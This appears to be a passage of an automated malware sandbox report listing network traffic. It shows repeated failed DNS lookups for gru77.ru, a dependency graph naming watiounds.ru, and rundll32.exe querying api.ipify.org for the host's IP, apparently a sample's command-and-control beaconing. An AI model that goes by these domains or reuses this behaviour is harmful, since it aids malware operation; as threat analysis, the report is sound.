                                          Apr 29, 2021 08:19:53.670871973 CEST53648818.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:54.685327053 CEST53648818.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:54.973160028 CEST5532753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:55.985600948 CEST5532753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:56.697555065 CEST53648818.8.8.8192.168.2.22
                                          Apr 29, 2021 08:19:56.999859095 CEST5532753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:19:59.012151003 CEST5532753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:00.022553921 CEST53553278.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:01.034954071 CEST53553278.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:02.049232960 CEST53553278.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:02.825726986 CEST5915053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:03.832724094 CEST5915053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:04.061923981 CEST53553278.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:04.847202063 CEST5915053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:06.859677076 CEST5915053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:07.875513077 CEST53591508.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:08.882638931 CEST53591508.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:09.897445917 CEST53591508.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:10.184326887 CEST6343953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:11.196929932 CEST6343953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:11.909252882 CEST53591508.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:12.210927963 CEST6343953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:14.223584890 CEST6343953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:15.234618902 CEST53634398.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:16.246690035 CEST53634398.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:17.260083914 CEST53634398.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:18.008296013 CEST6504053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:19.013288975 CEST6504053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:19.273317099 CEST53634398.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:20.027174950 CEST6504053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:22.039700985 CEST6504053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:23.057796955 CEST53650408.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:24.062902927 CEST53650408.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:25.076158047 CEST53650408.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:25.364985943 CEST6136953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:26.377291918 CEST6136953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:27.088551998 CEST53650408.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:27.391290903 CEST6136953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:29.403788090 CEST6136953192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:30.413861036 CEST53613698.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:31.427534103 CEST53613698.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:32.440834999 CEST53613698.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:33.228070974 CEST6551553192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:34.240520954 CEST6551553192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:34.453134060 CEST53613698.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:35.254304886 CEST6551553192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:37.266899109 CEST6551553192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:38.280260086 CEST53655158.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:39.292840004 CEST53655158.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:40.306994915 CEST53655158.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:40.588052034 CEST6023653192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:41.588229895 CEST6023653192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:42.320177078 CEST53655158.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:42.602658987 CEST6023653192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:44.614748955 CEST6023653192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:45.637773037 CEST53602368.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:46.638206959 CEST53602368.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:47.652447939 CEST53602368.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:48.421766043 CEST5319853192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:49.435831070 CEST5319853192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:49.664099932 CEST53602368.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:50.449642897 CEST5319853192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:52.462131977 CEST5319853192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:53.471081018 CEST53531988.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:54.485244036 CEST53531988.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:54.612215042 CEST53531988.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:55.773310900 CEST5002753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:56.783790112 CEST5002753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:57.512105942 CEST53531988.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:57.797938108 CEST5002753192.168.2.228.8.8.8

                                          ICMP Packets


                                          DNS Queries

                                          Apr 29, 2021 08:19:02.816595078 CEST192.168.2.228.8.8.80xfe80Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:03.829915047 CEST192.168.2.228.8.8.80xfe80Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:04.844069958 CEST192.168.2.228.8.8.80xfe80Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:06.856813908 CEST192.168.2.228.8.8.80xfe80Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:10.181422949 CEST192.168.2.228.8.8.80x2b1bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:11.193661928 CEST192.168.2.228.8.8.80x2b1bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:12.208159924 CEST192.168.2.228.8.8.80x2b1bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:14.220547915 CEST192.168.2.228.8.8.80x2b1bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:18.022157907 CEST192.168.2.228.8.8.80xd4abStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:19.025893927 CEST192.168.2.228.8.8.80xd4abStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:20.040262938 CEST192.168.2.228.8.8.80xd4abStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:22.052923918 CEST192.168.2.228.8.8.80xd4abStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:25.372905970 CEST192.168.2.228.8.8.80x5e91Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:26.374020100 CEST192.168.2.228.8.8.80x5e91Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:27.388202906 CEST192.168.2.228.8.8.80x5e91Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:29.400366068 CEST192.168.2.228.8.8.80x5e91Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:32.335165977 CEST192.168.2.228.8.8.80x2063Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:33.348094940 CEST192.168.2.228.8.8.80x2063Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:34.362051010 CEST192.168.2.228.8.8.80x2063Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:36.374481916 CEST192.168.2.228.8.8.80x2063Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:39.690820932 CEST192.168.2.228.8.8.80x52f3Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:40.695997953 CEST192.168.2.228.8.8.80x52f3Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:41.710190058 CEST192.168.2.228.8.8.80x52f3Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:43.722770929 CEST192.168.2.228.8.8.80x52f3Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:47.622308016 CEST192.168.2.228.8.8.80x8f38Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:48.621468067 CEST192.168.2.228.8.8.80x8f38Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:49.635816097 CEST192.168.2.228.8.8.80x8f38Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:51.648148060 CEST192.168.2.228.8.8.80x8f38Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:54.973160028 CEST192.168.2.228.8.8.80x427bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:55.985600948 CEST192.168.2.228.8.8.80x427bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:56.999859095 CEST192.168.2.228.8.8.80x427bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:59.012151003 CEST192.168.2.228.8.8.80x427bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:02.825726986 CEST192.168.2.228.8.8.80xbfaStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:03.832724094 CEST192.168.2.228.8.8.80xbfaStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:04.847202063 CEST192.168.2.228.8.8.80xbfaStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:06.859677076 CEST192.168.2.228.8.8.80xbfaStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:10.184326887 CEST192.168.2.228.8.8.80x3e7Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:11.196929932 CEST192.168.2.228.8.8.80x3e7Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:12.210927963 CEST192.168.2.228.8.8.80x3e7Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:14.223584890 CEST192.168.2.228.8.8.80x3e7Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:18.008296013 CEST192.168.2.228.8.8.80xf460Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:19.013288975 CEST192.168.2.228.8.8.80xf460Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:20.027174950 CEST192.168.2.228.8.8.80xf460Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:22.039700985 CEST192.168.2.228.8.8.80xf460Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:25.364985943 CEST192.168.2.228.8.8.80x29b4Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:26.377291918 CEST192.168.2.228.8.8.80x29b4Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:27.391290903 CEST192.168.2.228.8.8.80x29b4Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:29.403788090 CEST192.168.2.228.8.8.80x29b4Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:33.228070974 CEST192.168.2.228.8.8.80xaf1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:34.240520954 CEST192.168.2.228.8.8.80xaf1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:35.254304886 CEST192.168.2.228.8.8.80xaf1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:37.266899109 CEST192.168.2.228.8.8.80xaf1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:40.588052034 CEST192.168.2.228.8.8.80x9014Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:41.588229895 CEST192.168.2.228.8.8.80x9014Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:42.602658987 CEST192.168.2.228.8.8.80x9014Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:44.614748955 CEST192.168.2.228.8.8.80x9014Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:48.421766043 CEST192.168.2.228.8.8.80xb4e1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:49.435831070 CEST192.168.2.228.8.8.80xb4e1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:50.449642897 CEST192.168.2.228.8.8.80xb4e1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:52.462131977 CEST192.168.2.228.8.8.80xb4e1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:55.773310900 CEST192.168.2.228.8.8.80xbf8bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:56.783790112 CEST192.168.2.228.8.8.80xbf8bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:57.797938108 CEST192.168.2.228.8.8.80xbf8bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:59.810934067 CEST192.168.2.228.8.8.80xbf8bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:03.630489111 CEST192.168.2.228.8.8.80x3420Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:04.631581068 CEST192.168.2.228.8.8.80x3420Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:05.645612955 CEST192.168.2.228.8.8.80x3420Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:07.658106089 CEST192.168.2.228.8.8.80x3420Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:10.992656946 CEST192.168.2.228.8.8.80x48d4Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:11.995584965 CEST192.168.2.228.8.8.80x48d4Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:13.009659052 CEST192.168.2.228.8.8.80x48d4Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:15.021749020 CEST192.168.2.228.8.8.80x48d4Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:18.852174044 CEST192.168.2.228.8.8.80x8d9fStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:19.858361959 CEST192.168.2.228.8.8.80x8d9fStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:20.872631073 CEST192.168.2.228.8.8.80x8d9fStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:22.885135889 CEST192.168.2.228.8.8.80x8d9fStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:25.241588116 CEST192.168.2.228.8.8.80x3ca1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:26.255305052 CEST192.168.2.228.8.8.80x3ca1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:27.269269943 CEST192.168.2.228.8.8.80x3ca1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:29.281857967 CEST192.168.2.228.8.8.80x3ca1Standard query (0)gru77.ruA (IP address)IN (0x0001)

                                          DNS Answers

                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                          Apr 29, 2021 08:19:15.231134892 CEST8.8.8.8192.168.2.220x2b1bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:16.244839907 CEST8.8.8.8192.168.2.220x2b1bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:16.368014097 CEST8.8.8.8192.168.2.220x2b1bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:19.270474911 CEST8.8.8.8192.168.2.220x2b1bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:23.069952011 CEST8.8.8.8192.168.2.220xd4abServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:24.075489998 CEST8.8.8.8192.168.2.220xd4abServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:25.088628054 CEST8.8.8.8192.168.2.220xd4abServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:27.101855040 CEST8.8.8.8192.168.2.220xd4abServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:29.530395031 CEST8.8.8.8192.168.2.220x5e91Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:31.423455000 CEST8.8.8.8192.168.2.220x5e91Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:32.437933922 CEST8.8.8.8192.168.2.220x5e91Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:34.449493885 CEST8.8.8.8192.168.2.220x5e91Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:37.384196997 CEST8.8.8.8192.168.2.220x2063Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:38.397454977 CEST8.8.8.8192.168.2.220x2063Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:39.411489010 CEST8.8.8.8192.168.2.220x2063Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:41.424129009 CEST8.8.8.8192.168.2.220x2063Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:44.740514040 CEST8.8.8.8192.168.2.220x52f3Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:45.745582104 CEST8.8.8.8192.168.2.220x52f3Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:46.759238958 CEST8.8.8.8192.168.2.220x52f3Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:48.772165060 CEST8.8.8.8192.168.2.220x52f3Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:52.672000885 CEST8.8.8.8192.168.2.220x8f38Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:53.670871973 CEST8.8.8.8192.168.2.220x8f38Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:54.685327053 CEST8.8.8.8192.168.2.220x8f38Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:56.697555065 CEST8.8.8.8192.168.2.220x8f38Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:00.022553921 CEST8.8.8.8192.168.2.220x427bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:01.034954071 CEST8.8.8.8192.168.2.220x427bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:02.049232960 CEST8.8.8.8192.168.2.220x427bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:04.061923981 CEST8.8.8.8192.168.2.220x427bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:07.875513077 CEST8.8.8.8192.168.2.220xbfaServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:08.882638931 CEST8.8.8.8192.168.2.220xbfaServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:09.897445917 CEST8.8.8.8192.168.2.220xbfaServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:11.909252882 CEST8.8.8.8192.168.2.220xbfaServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:15.234618902 CEST8.8.8.8192.168.2.220x3e7Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:16.246690035 CEST8.8.8.8192.168.2.220x3e7Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:17.260083914 CEST8.8.8.8192.168.2.220x3e7Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:19.273317099 CEST8.8.8.8192.168.2.220x3e7Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:23.057796955 CEST8.8.8.8192.168.2.220xf460Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:24.062902927 CEST8.8.8.8192.168.2.220xf460Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:25.076158047 CEST8.8.8.8192.168.2.220xf460Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:27.088551998 CEST8.8.8.8192.168.2.220xf460Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:30.413861036 CEST8.8.8.8192.168.2.220x29b4Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:31.427534103 CEST8.8.8.8192.168.2.220x29b4Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:32.440834999 CEST8.8.8.8192.168.2.220x29b4Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:34.453134060 CEST8.8.8.8192.168.2.220x29b4Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:38.280260086 CEST8.8.8.8192.168.2.220xaf1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:39.292840004 CEST8.8.8.8192.168.2.220xaf1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:40.306994915 CEST8.8.8.8192.168.2.220xaf1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:42.320177078 CEST8.8.8.8192.168.2.220xaf1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:45.637773037 CEST8.8.8.8192.168.2.220x9014Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:46.638206959 CEST8.8.8.8192.168.2.220x9014Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:47.652447939 CEST8.8.8.8192.168.2.220x9014Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:49.664099932 CEST8.8.8.8192.168.2.220x9014Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:53.471081018 CEST8.8.8.8192.168.2.220xb4e1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:54.485244036 CEST8.8.8.8192.168.2.220xb4e1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:54.612215042 CEST8.8.8.8192.168.2.220xb4e1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:57.512105942 CEST8.8.8.8192.168.2.220xb4e1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:00.822374105 CEST8.8.8.8192.168.2.220xbf8bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:01.833441019 CEST8.8.8.8192.168.2.220xbf8bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:02.847553015 CEST8.8.8.8192.168.2.220xbf8bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:04.860924006 CEST8.8.8.8192.168.2.220xbf8bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:08.680171013 CEST8.8.8.8192.168.2.220x3420Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:09.680903912 CEST8.8.8.8192.168.2.220x3420Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:09.806315899 CEST8.8.8.8192.168.2.220x3420Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:12.707380056 CEST8.8.8.8192.168.2.220x3420Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:16.045171976 CEST8.8.8.8192.168.2.220x48d4Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:17.048170090 CEST8.8.8.8192.168.2.220x48d4Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:18.061734915 CEST8.8.8.8192.168.2.220x48d4Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:20.074213028 CEST8.8.8.8192.168.2.220x48d4Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:22.929033041 CEST8.8.8.8192.168.2.220x8d9fServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:24.907818079 CEST8.8.8.8192.168.2.220x8d9fServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:24.983545065 CEST8.8.8.8192.168.2.220x8d9fServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:27.934767962 CEST8.8.8.8192.168.2.220x8d9fServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:30.293646097 CEST8.8.8.8192.168.2.220x3ca1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:30.334377050 CEST8.8.8.8192.168.2.220x3ca1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:32.321976900 CEST8.8.8.8192.168.2.220x3ca1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:34.334450960 CEST8.8.8.8192.168.2.220x3ca1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • api.ipify.org
                                          • watiounds.ru

                                          HTTP Packets

                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          0 | 192.168.2.22 | 49165 | 50.16.249.42 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:16:08.625492096 CEST | 1 | OUT | GET / HTTP/1.1
                                          Accept: */*
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: api.ipify.org
                                          Cache-Control: no-cache
                                          Apr 29, 2021 08:16:08.774343014 CEST | 1 | IN | HTTP/1.1 200 OK
                                          Server: Cowboy
                                          Connection: keep-alive
                                          Content-Type: text/plain
                                          Vary: Origin
                                          Date: Thu, 29 Apr 2021 06:16:08 GMT
                                          Content-Length: 10
                                          Via: 1.1 vegur
                                          Data Raw: 38 34 2e 31 37 2e 35 32 2e 33
                                          Data Ascii: 84.17.52.3


